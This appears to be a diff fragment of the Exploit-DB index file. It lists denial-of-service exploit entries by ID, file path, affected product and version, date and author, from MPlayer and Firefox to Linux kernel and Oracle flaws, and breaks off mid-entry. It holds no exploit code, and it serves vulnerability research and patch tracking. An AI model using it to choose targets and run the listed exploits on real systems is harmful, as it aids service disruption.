+32856,exploits/linux/dos/32856.txt,"MPlayer - '.AAC' File Handling Denial of Service",2008-10-07,"Hanno Bock",dos,linux, +32857,exploits/linux/dos/32857.txt,"MPlayer - '.OGM' File Handling Denial of Service",2008-10-07,"Hanno Bock",dos,linux, +32860,exploits/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",dos,java, +32865,exploits/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",dos,multiple, +32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows, +32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)",2014-04-16,"motaz reda",dos,windows, +32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows, +32926,exploits/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux, +32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows, +32949,exploits/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,dos,multiple, +32951,exploits/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",dos,novell, +32956,exploits/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 - File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",dos,windows, +33337,exploits/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",dos,osx, +32961,exploits/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",dos,linux, +32964,exploits/linux/dos/32964.c,"GnuTLS 2.6.x - libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service",2009-04-30,"Miroslav Kratochvil",dos,linux, +33077,exploits/linux/dos/33077.c,"MySQL 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,dos,linux, +32995,exploits/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow",2009-05-27,"Simple Nomad",dos,linux, +33015,exploits/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",dos,linux, +33017,exploits/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",dos,linux, +33018,exploits/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial of Service)",2014-04-25,LiquidWorm,dos,windows, +33020,exploits/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial of Service",2009-06-02,"Anibal Sacco",dos,linux, +33031,exploits/linux/dos/33031.html,"Mozilla Firefox 3.0.x - Large '.GIF' File Background Denial of Service",2009-05-10,"Ahmad Muammar",dos,linux, +33036,exploits/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial of Service",2009-05-05,"Shawn O. Pearce",dos,linux, +33037,exploits/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",dos,multiple, +33040,exploits/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial of Service",2009-05-03,"Zeeshan Ali",dos,linux, +33041,exploits/linux/dos/33041.txt,"Irssi 0.8.13 - 'WALLOPS' Message Off-by-One Heap Memory Corruption",2009-05-15,nemo,dos,linux, +33042,exploits/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",dos,linux, +33043,exploits/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",dos,linux, +33049,exploits/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,dos,linux, +33056,exploits/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,dos,windows, +33058,exploits/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",dos,multiple, +33059,exploits/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,dos,windows, +33062,exploits/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,dos,windows, +33073,exploits/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",dos,linux,123 +33080,exploits/multiple/dos/33080.txt,"Oracle 11.1 - Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",dos,multiple, +33083,exploits/multiple/dos/33083.txt,"Oracle 9i/10g Database - TNS Command Remote Denial of Service",2009-06-14,"Dennis Yurichev",dos,multiple, +33086,exploits/multiple/dos/33086.txt,"America's Army 3.0.4 - Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",dos,multiple, +33088,exploits/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference",2009-06-17,"Christian Borntraeger",dos,linux, +33350,exploits/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows, +33348,exploits/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - Denial of Service (PoC)",2014-05-14,"Martinez FrostCard",dos,windows, +33579,exploits/multiple/dos/33579.txt,"Ingres Database 9.3 - Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",dos,multiple, +33096,exploits/multiple/dos/33096.txt,"Crysis 1.21/1.5 - HTTP/XML-RPC Service Access Violation Remote Denial of Service",2009-06-20,"Luigi Auriemma",dos,multiple, +33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple, +33100,exploits/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service",2009-06-22,"Luigi Auriemma",dos,multiple, +33101,exploits/linux/dos/33101.txt,"Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",dos,linux, +33104,exploits/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",dos,multiple, +33105,exploits/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",dos,multiple, +33133,exploits/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,dos,multiple, +33134,exploits/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",dos,linux, +33584,exploits/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",dos,multiple, +33148,exploits/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",dos,linux, +33173,exploits/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,dos,windows, +33174,exploits/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (2)",2007-02-07,trevordixon,dos,windows, +33175,exploits/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,dos,windows, +33176,exploits/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service",2009-08-18,"Brad Antoniewicz",dos,linux, +33182,exploits/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",dos,multiple, +33183,exploits/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (1)",2009-08-25,"Francis Provencher",dos,novell, +33184,exploits/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (2)",2009-08-25,"Francis Provencher",dos,novell, +33185,exploits/windows/dos/33185.html,"Nokia Lotus Notes Connector - 'lnresobject.dll' Remote Denial of Service",2009-08-25,"Francis Provencher",dos,windows, +33193,exploits/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",dos,linux, +33205,exploits/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",dos,windows, +33216,exploits/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",dos,hardware, +33220,exploits/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",dos,windows, +33221,exploits/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",dos,windows, +33222,exploits/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Resource Exhaustion (Denial of Service)",2009-09-15,"Buildbot Builder",dos,linux, +33223,exploits/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Remote Denial of Service",2009-09-15,"Buildbot Builder",dos,linux, +33224,exploits/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Remote Denial of Service",2009-09-15,"Buildbot Builder",dos,linux, +33225,exploits/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",dos,windows, +33228,exploits/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",dos,linux, +33230,exploits/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",dos,linux, +33233,exploits/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",dos,linux, +33235,exploits/osx/dos/33235.rb,"Apple iTunes 9.0 - '.pls' Buffer Overflow",2009-09-22,"Roger Hart",dos,osx, +33710,exploits/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",dos,windows, +33251,exploits/multiple/dos/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",dos,multiple, +33269,exploits/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",dos,linux, +33271,exploits/windows/dos/33271.py,"VMware Player / VMware Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,dos,windows, +33280,exploits/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",dos,hardware, +33283,exploits/linux/dos/33283.txt,"Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,dos,linux, +33289,exploits/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",dos,linux, +33306,exploits/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial of Service Vulnerabilities",2009-10-22,"laurent gaffie",dos,linux, +33312,exploits/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",dos,linux, +33314,exploits/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",dos,linux, +33318,exploits/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",dos,bsd, +33319,exploits/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",dos,bsd, +33591,exploits/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",dos,linux, +33592,exploits/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",dos,linux, +33328,exploits/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",dos,hardware, +33332,exploits/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",dos,windows, +33335,exploits/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",dos,windows, +33384,exploits/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",dos,windows, +33386,exploits/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,dos,multiple, +33397,exploits/linux/dos/33397.txt,"MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service",2009-11-23,"Shane Bester",dos,linux, +33398,exploits/linux/dos/33398.txt,"MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service",2009-11-23,"Shane Bester",dos,linux, +33472,exploits/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",dos,multiple, +33479,exploits/osx/dos/33479.c,"Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",dos,osx, +33480,exploits/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",dos,linux, +33483,exploits/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,dos,multiple, +33495,exploits/windows/dos/33495.py,"Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",dos,windows, +33581,exploits/linux/dos/33581.txt,"Hybserv2 - ':help' Denial of Service",2010-01-29,"Julien Cristau",dos,linux, +33583,exploits/hardware/dos/33583.pl,"Xerox WorkCentre - PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",dos,hardware, +33506,exploits/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",dos,multiple, +33635,exploits/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",dos,linux, +33524,exploits/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv' Remote Denial of Service",2010-01-14,"Hellcode Research",dos,linux, +33527,exploits/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 - 'ibmdiradm' Null Pointer Dereference Denial of Service",2006-04-01,Intevydis,dos,unix, +33531,exploits/multiple/dos/33531.py,"Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow",2010-01-15,Intevydis,dos,multiple, +33532,exploits/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,dos,multiple, +33533,exploits/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,dos,windows, +33640,exploits/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,dos,windows, +40913,exploits/android/dos/40913.java,"Samsung Devices KNOX Extensions - OTP Service Heap Overflow",2016-12-13,"Google Security Research",dos,android, +33549,exploits/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",dos,linux, +33556,exploits/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (Metasploit)",2014-05-28,j0sm1,dos,multiple,5247 +33559,exploits/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,dos,multiple, +33560,exploits/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,dos,multiple, +33571,exploits/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,dos,linux, +33585,exploits/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",dos,lin_x86-64, +33587,exploits/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",dos,windows, +33607,exploits/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",dos,multiple, +33608,exploits/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",dos,windows, +33625,exploits/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",dos,php, +33713,exploits/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",dos,windows, +33677,exploits/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,dos,php, +33672,exploits/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,dos,linux, +33707,exploits/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter '.MP3' File Divide-by-Zero Denial of Service",2010-03-04,"Matthew Bergin",dos,windows, +33708,exploits/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-05,kingcope,dos,bsd, +33838,exploits/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,dos,windows, +33711,exploits/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",dos,windows, +33719,exploits/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,dos,windows, +33729,exploits/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service",2014-06-13,"Bernt Marius Johnsen",dos,multiple, +33733,exploits/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",dos,windows, +33735,exploits/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",dos,multiple, +33737,exploits/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",dos,hardware, +33755,exploits/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",dos,php, +33770,exploits/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,dos,windows, +33775,exploits/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,dos,windows, +33778,exploits/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Format String Denial of Service",2010-03-20,Rick2600,dos,windows, +33800,exploits/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",dos,multiple, +33801,exploits/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",dos,linux, +33804,exploits/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,dos,windows, +33819,exploits/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",dos,windows, +33849,exploits/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",dos,windows, +33850,exploits/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,dos,linux, +33860,exploits/windows/dos/33860.html,"Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",dos,windows, +34145,exploits/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,dos,unix, +33876,exploits/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary Memory Read",2007-09-14,mu-b,dos,multiple, +33879,exploits/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,dos,multiple, +33886,exploits/linux/dos/33886.txt,"Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption",2010-04-27,"Toshiyuki Okajima",dos,linux, +40096,exploits/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (2)",2016-07-13,COSIG,dos,multiple, +40097,exploits/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,dos,multiple, +40098,exploits/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,dos,multiple, +34102,exploits/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",dos,linux,80 +33965,exploits/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",dos,linux, +33966,exploits/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",dos,linux, +33968,exploits/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",dos,windows, +33924,exploits/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",dos,windows, +33926,exploits/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",dos,windows, +33943,exploits/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure",2014-07-01,"BGA Security",dos,aix,8080 +33951,exploits/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,dos,windows, +33973,exploits/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",dos,windows, +33977,exploits/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",dos,windows, +34010,exploits/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",dos,win_x86, +34027,exploits/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",dos,solaris, +34028,exploits/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",dos,solaris, +34051,exploits/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",dos,windows, +34058,exploits/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",dos,multiple, +34069,exploits/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,dos,windows, +34090,exploits/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",dos,multiple, +34093,exploits/windows/dos/34093.txt,"EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",dos,windows, +34094,exploits/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,dos,windows, +34340,exploits/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",dos,multiple, +34129,exploits/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",dos,windows, +34133,exploits/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",dos,linux, +34135,exploits/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,dos,windows, +34158,exploits/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",dos,windows, +34151,exploits/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,dos,windows, +34162,exploits/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",dos,windows, +34164,exploits/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,dos,linux, +34172,exploits/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,dos,hardware, +34203,exploits/hardware/dos/34203.txt,"D-Link DWR-113 Rev. Ax - Cross-Site Request Forgery / Denial of Service",2014-07-30,"Blessen Thomas",dos,hardware, +34227,exploits/windows/dos/34227.txt,"Qt 4.6.3 - Remote Denial of Service",2010-06-29,"Luigi Auriemma",dos,windows, +34228,exploits/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service",2010-06-29,"Luigi Auriemma",dos,linux, +34233,exploits/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial of Service",2010-07-01,"Azim Poonawala",dos,windows, +34248,exploits/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",dos,multiple, +34249,exploits/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",dos,linux, +34251,exploits/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",dos,windows, +34261,exploits/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",dos,multiple, +34270,exploits/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",dos,multiple, +34278,exploits/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",dos,linux, +34279,exploits/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",dos,linux, +34528,exploits/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,dos,multiple, +34281,exploits/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 - File Processing Remote Denial of Service",2010-07-09,"Prashant Uniyal",dos,windows, +34306,exploits/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,dos,hardware,23 +34307,exploits/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",dos,hardware, +34309,exploits/solaris/dos/34309.txt,"Oracle 